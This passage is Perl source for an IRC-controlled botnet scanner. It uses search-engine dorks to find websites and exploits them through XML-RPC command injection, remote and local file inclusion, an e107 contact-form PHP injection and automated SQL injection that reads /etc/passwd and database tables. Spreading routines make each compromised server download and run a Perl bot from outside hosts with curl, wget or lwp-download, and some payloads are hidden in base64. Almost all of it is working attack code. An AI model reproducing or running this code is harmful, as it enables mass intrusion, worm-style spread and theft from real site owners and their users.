@14$engz14)14(7@14System14)3 http://".$lfitarget."12".$bugz."10[LFI] 14(0".$sys." 14uid=".$u
id."14)");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14LFI14)(4@1
4$engz14)14(7@14System14)3 http://".$lfitarget."12".$bugz."10[LFI] 14(0".$sys." 14uid=".$ui
d."14)");
}
}
else {
}
} exit } sleep(3);
}
}
}
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'bamby';echo`".$dwa."`;echo'solo';exit;/*</name></value
></param></params></methodCall>";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content
=> $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML-CMD14)7 $1");
}
}
sub xmlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @xmlgoogle=&google($dork);
push(@xmltotal, @xmlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @xmlalltheweb=&alltheweb($dork);
push(@xmltotal, @xmlalltheweb);
}
if ($engz =~ /Bing/) {
my @xmlBing=&Bing($dork);
push(@xmltotal, @xmlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @xmlaltavista=&altavista($dork);
push(@xmltotal, @xmlaltavista);
}
if ($engz =~ /AsK/) {
my @xmlask=&ask($dork);
push(@xmltotal, @xmlask);
}
if ($engz =~ /UoL/) {
my @xmluol=&uol($dork);
push(@xmltotal, @xmluol);
}

if ($engz =~ /YahOo/) {
my @xmlyahoo=&yahoo($dork);
push(@xmltotal, @xmlyahoo);
}
my @xmlclean = &calculate(@xmltotal);
if (scalar(@xmlclean) != 0) {
}
my $uni=scalar(@xmlclean);
foreach my $xmltarget (@xmlclean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel ::14,1(7@14XML14)14(4@14$engz14)14
Scanning Done For7 $dork");
}
my $xpl = "http://".$xmltarget.$bugz;
my $xmlsprd = "cd /tmp;lwp-download http://iseulbi.com/xe/mysh.t
xt;perl mysh.txt;rm -rf *.txt*;wget http://iseulbi.com/xe/mysh.txt;perl mysh.txt
;rm -rf *.txt*";
my $strona = getcontent($xpl);
if ( $strona =~ /faultCode/ ) {
xmlcek($xpl);
xmlxspread($xpl,$xmlsprd);
}
}
}
sub rfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @rfigoogle=&google($dork);
push(@rfitotal, @rfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @rfialltheweb=&alltheweb($dork);
push(@rfitotal, @rfialltheweb);
}
if ($engz =~ /Bing/) {
my @rfiBing=&Bing($dork);
push(@rfitotal, @rfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @rfialtavista=&altavista($dork);
push(@rfitotal, @rfialtavista);
}
if ($engz =~ /AsK/) {
my @rfiask=&ask($dork);
push(@rfitotal, @rfiask);
}
if ($engz =~ /UoL/) {
my @rfiuol=&uol($dork);
push(@rfitotal, @rfiuol);
}
if ($engz =~ /YahOo/) {
my @rfiyahoo=&yahoo($dork);
push(@rfitotal, @rfiyahoo);
}

my @rficlean = &calculate(@rfitotal);
if (scalar(@rficlean) != 0) {
}
my $uni=scalar(@rficlean);
foreach my $rfitarget (@rficlean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel ::14,1(7@14RFI14)14(4@14$engz14)14
Scanning Done For7 $dork");
}
my $rfixpl = "http://".$rfitarget.$bugz.$rfiid;
my $inj
= " http://".$rfitarget."12".$bugz."7[PHPCMD]?";
my $re = getcontent($rfixpl);
if ($re =~ /ratoscan4/){
getcontent($rfispd);
os($rfixpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)3$
inj0 $os");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14RFI14)3$i
nj0 $os");
}
}
}
sub sqlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @sqlgoogle=&google($dork);
push(@sqltotal, @sqlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @sqlalltheweb=&alltheweb($dork);
push(@sqltotal, @sqlalltheweb);
}
if ($engz =~ /Bing/) {
my @sqlBing=&Bing($dork);
push(@sqltotal, @sqlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @sqlaltavista=&altavista($dork);
push(@sqltotal, @sqlaltavista);
}
if ($engz =~ /AsK/) {
my @sqlask=&ask($dork);
push(@sqltotal, @sqlask);
}
if ($engz =~ /UoL/) {
my @sqluol=&uol($dork);
push(@sqltotal, @sqluol);
}
if ($engz =~ /YahOo/) {
my @sqlyahoo=&yahoo($dork);
push(@sqltotal, @sqlyahoo);
}
my @sqlclean = &calculate(@sqltotal);
if (scalar(@sqlclean) != 0) {
}

my $uni=scalar(@sqlclean);
foreach my $sqltarget (@sqlclean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14(4@14$engz14)14 Scan
ning Done For14 $dork");
}
my $xpl = "http://".$sqltarget.$bugz."'";
my $vuln = "http://".$sqltarget."12".$bugz."7[SQL]";
my $sqlsite = "http://".$sqltarget.$bugz;
my $strona = getcontent($xpl);
if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m
/Query failed/i || $strona =~ m/SQL query failed/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MySQL1
4)7 $vuln ");&sqlbrute($sqlsite);}
elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Un
closed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MsSQL1
4)7 $vuln ");}
elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/OD
BC Microsoft Access Driver/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MsAcc
ess14)7 $vuln ");}
}
}
sub cmde107() {
my $path = $_[0];
my $incmd = $_[1];
my $codecmd = encode_base64($incmd);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base
64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd
;
$access = new LWP::UserAgent;
$access->agent("Mozilla/5.0");
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%
5B%2Fphp%5D");
my $res = $access->request($req);
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e107-CMD14)4 $mydata");
}
}
sub e107scan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @e107google=&google($dork);
push(@e107total, @e107google);
}
if ($engz =~ /AllTheWeb/) {
my @e107alltheweb=&alltheweb($dork);
push(@e107total, @e107alltheweb);
}

if ($engz =~ /Bing/) {
my @e107Bing=&Bing($dork);
push(@e107total, @e107Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @e107altavista=&altavista($dork);
push(@e107total, @e107altavista);
}
if ($engz =~ /AsK/) {
my @e107ask=&ask($dork);
push(@e107total, @e107ask);
}
if ($engz =~ /UoL/) {
my @e107uol=&uol($dork);
push(@e107total, @e107uol);
}
if ($engz =~ /YahOo/) {
my @e107yahoo=&yahoo($dork);
push(@e107total, @e107yahoo);
}
my @e107clean = &calculate(@e107total);
if (scalar(@e107clean) != 0) {
}
my $uni=scalar(@e107clean);
foreach my $e107target (@e107clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)(4@14$engz14)14
Scanning Done For7 $dork");
}
my $cmd = "echo(base64_decode(\"Vm9v\").php_uname().base64_decod
e(\"RG9v\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWs
vaW1hZ2VzL25ldy9wYm90LnR4dD8=\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW
50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8=\"));";
my $ua = LWP::UserAgent->new or die;
$ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
$ua->timeout(15);
my $xpl = "http://".$e107target."/contact.php";
$xpl =~ s/\/\/contact.php/\/contact.php/g;
my $req = HTTP::Request->new(POST => $xpl);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3B
die%28%29%3B%5B%2Fphp%5D");
my $res = $ua->request($req);
my $cont = $res->content;
if ($cont =~ /Voo(.*)Doo/) {
my $uname = $1;
$uname=~s/\n//;
$uname=~s/\r//;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7
@14e10714)(3$xpl14)0 $uname ");
&spreade107($xpl);
}
}
}
sub spreade107() {
my $path = $_[0];
my $incmd = "cd /var/tmp; curl -O http://www.otbr.com.br/bot.txt; perl bot.txt;

wget http://www.otbr.com.br/bot.txt; perl bot.txt; lwp-download http://www.otbr.


com.br/bot.txt; perl bot.txt; rm -rf bot.txt";
my $codecmd = encode_base64($incmd);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base
64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd
;
$access = new LWP::UserAgent;
$access->agent("Mozilla/5.0");
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%
5B%2Fphp%5D");
my $res = $access->request($req);
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e107-CMD14)4 $mydata");
}
}
sub enc()
{
my $md5_hash = $1;
my $md5_generated = md5_hex($md5_hash);
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 Encode14)7 $md5_generated"
);
}
sub dec()
{
my $md5 = $1;
my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5;
my $found = getcontent($crac);
if
($found =~ /<string><!\[CDATA\[(.*)\]\]><\/string>/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 De
code14)7 $1");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 De
code14)7 $1");
}
}
sub xmlcek {
my $xmltgt = $_[0];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/*</name></
value></param></params></methodCall>";
my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Con
tent => $exploit);
if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {
$os=$1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)(3$xmltgt14)0 $os ");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14XML14)(3$xmltgt14)0 $os ");
}}
sub xmlxspread() {
my $xmltargt = $_[0];

my $xmlsprd = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/*</name></val
ue></param></params></methodCall>";
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', C
ontent => $exploit);
}
sub getcontent() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(15);
my $response = $ua->request($req);
return $response->content;
}
sub lfiexploit() {
my $url = $_[0];
my $rce = $_[1];
my $agent = "<?php echo \"j13mb0t#\"; passthru(\'".$rce."\'); echo \"#j13mb0
t\"; ?>";
my $ua = LWP::UserAgent->new(agent => $agent);
$ua->timeout(15);
my $req = HTTP::Request->new(GET => $url);
my $response = $ua->request($req);
return $response->content;
}
sub google(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=100){
my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&s
tart=".$b);
my $Res=query($Go);
while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub SIGN() {
if (($powered !~ /M/)||($mail !~ /web/)) {
print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n";
exec("rm -rf $0 && pkill perl");
}
}
sub alltheweb() {
my @lst;
my $key = $_[0];
my $b = 0;

my $pg = 0;
for ($b=0; $b<=1000; $b+=100) {
my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=10
0&q=".key($key)."&o=".$b);
my $Res = query($all);
while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}
sub uol() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&st
art=".$b);
my $Res = query($UoL);
while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
my $k
= $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub Bing() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first="
.$b."&FORM=PERE");
my $Res = query($bing);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /msn|live|bing/ ) {
my $k
= $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub altavista(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1

&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while ($Res=~m/<span class=ngrn>(.+?)\//g){
if ($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub ask() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=10) {
my $Ask = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=E
E90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
my $Res = query($Ask);
while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
if ($1 !~ /ask.com/){
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub yahoo() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=500; $b+=1) {
my $yahoo = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $Res = query($yahoo);
while ($Res =~ m/26u=(.*?)%26w=/g) {
if ($1 !~ /yahoo/){
my $k = $1;
my @grep = links($k);
push(@lst, @grep);
}
}
}
return @lst;
}
sub os() {
my $target=$_[0];
my $re = &query($target);
while ($re =~ m/<br>OSTYPE:(.+?)\<br>/g) {
$os = $1;
}
}

sub query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ( $query eq "" ) { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto =>
"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mo
zilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
close($sock);
};
return $page;
}
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
}
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
}
sub calculate {
my @calculate = ();
my %visti = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visti{$element}++;
push @calculate, $element;
}
return @calculate;

}
sub sqlbrute() {
my $site=$_[0];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inye
ction.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)3 $sql ");
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n")
;
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn.
"from".$cmn."information_schema.tables".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14INFO_SCHEMA14)3 $sql ");
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn.
"from".$cmn."mysql.user".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14USER14)3 $sql ");
}
else
{
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f657463
2f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
if($response =~ /root:x:/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14Load File14)3 $sql ");
}

else
{
}
foreach $tabla(@tabele)
{
chomp($tabla);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e7
0776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to ge
t tables\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$
cmn."from".$cmn.$tabla.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $chann
el :14,1(7@14SQL15)(4@14Tabel14)3 $sql ");
&tabelka($site,$tabla);
}
}
}
}
}
sub tabelka() {
my $site=$_[0];
my $tabla=$_[1];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
{
chomp($columna);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696
e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7
@14SQL15) (7@14SQLi Vuln14)3 $site 14(4@14Kolom14)3 $columna 14(4@14Tabel14)3 $tabla ");
}
}
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub join {
sendraw("JOIN $_[0]");
}
sub part {
sendraw("PART $_[0]");
}

sub quit {
sendraw("QUIT $_[0]");
exit;
}

You might also like